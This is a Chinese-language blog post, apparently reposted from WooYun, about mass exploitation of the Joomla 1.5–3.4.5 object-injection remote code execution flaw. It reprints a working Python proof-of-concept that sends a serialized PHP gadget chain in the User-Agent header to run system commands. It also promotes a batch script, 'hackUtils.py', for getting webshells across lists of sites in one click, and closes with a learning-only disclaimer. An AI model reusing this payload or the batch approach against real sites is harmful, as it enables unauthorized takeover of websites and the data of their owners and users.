Menu

JOOMLA 1.5 – 3.4.5 远程代码执行之批量GETSHELL

2015-12-17 - Joomla, 漏洞预警

看大家发的都是单打独斗的,我来献丑来个批量getshell的吧,不喜勿喷!

0X01 背景
近日,Joomla 1.5 – 3.4.5爆出了一个远程代码执行的漏洞,此洞可谓影响相当之大,各个安全机构都发布了漏洞的分析报告和POC,笔者就不在此赘述了,相关的漏洞分析参见:

Joomla 对象注入漏洞分析报告

Joomla远程代码执行漏洞分析

Joomla对象注入漏洞分析(含漏洞利用方式)

Joomla 1.5 – 3.4.5 – Object Injection Remote Command Execution

0x02 利用
下面是被公布在exploit-db上的一个exp脚本:

'''
Simple PoC for Joomla Object Injection.
Gary @ Sec-1 ltd
http://www.sec-1.com/
'''

import requests #  easy_install requests

def get_url(url, user_agent):

headers = {
'User-Agent': user_agent
}
cookies = requests.get(url,headers=headers).cookies
for _ in range(3):
response = requests.get(url, headers=headers,cookies=cookies)
return response

def php_str_noquotes(data):
"Convert string to chr(xx).chr(xx) for use in php"
encoded = ""
for char in data:
encoded += "chr({0}).".format(ord(char))

return encoded[:-1]

def generate_payload(php_payload):

php_payload = "eval({0})".format(php_str_noquotes(php_payload))

terminate = '\xf0\xfd\xfd\xfd';
exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate

return exploit_template

pl = generate_payload("system('touch /tmp/fx');")

print get_url("http://172.31.6.242/", pl)

笔者在以上脚本的基础上改写了一个批量getshell的脚本。

 

111

执行命令python hackUtils.py -r [url文件]一键获取webshell:

 

222

333

 

脚本地址:传送门

 

声明:仅作学习目的,任何人不可用于非法目的,否则后果由其本人承担!

 

转自wooyun:传送门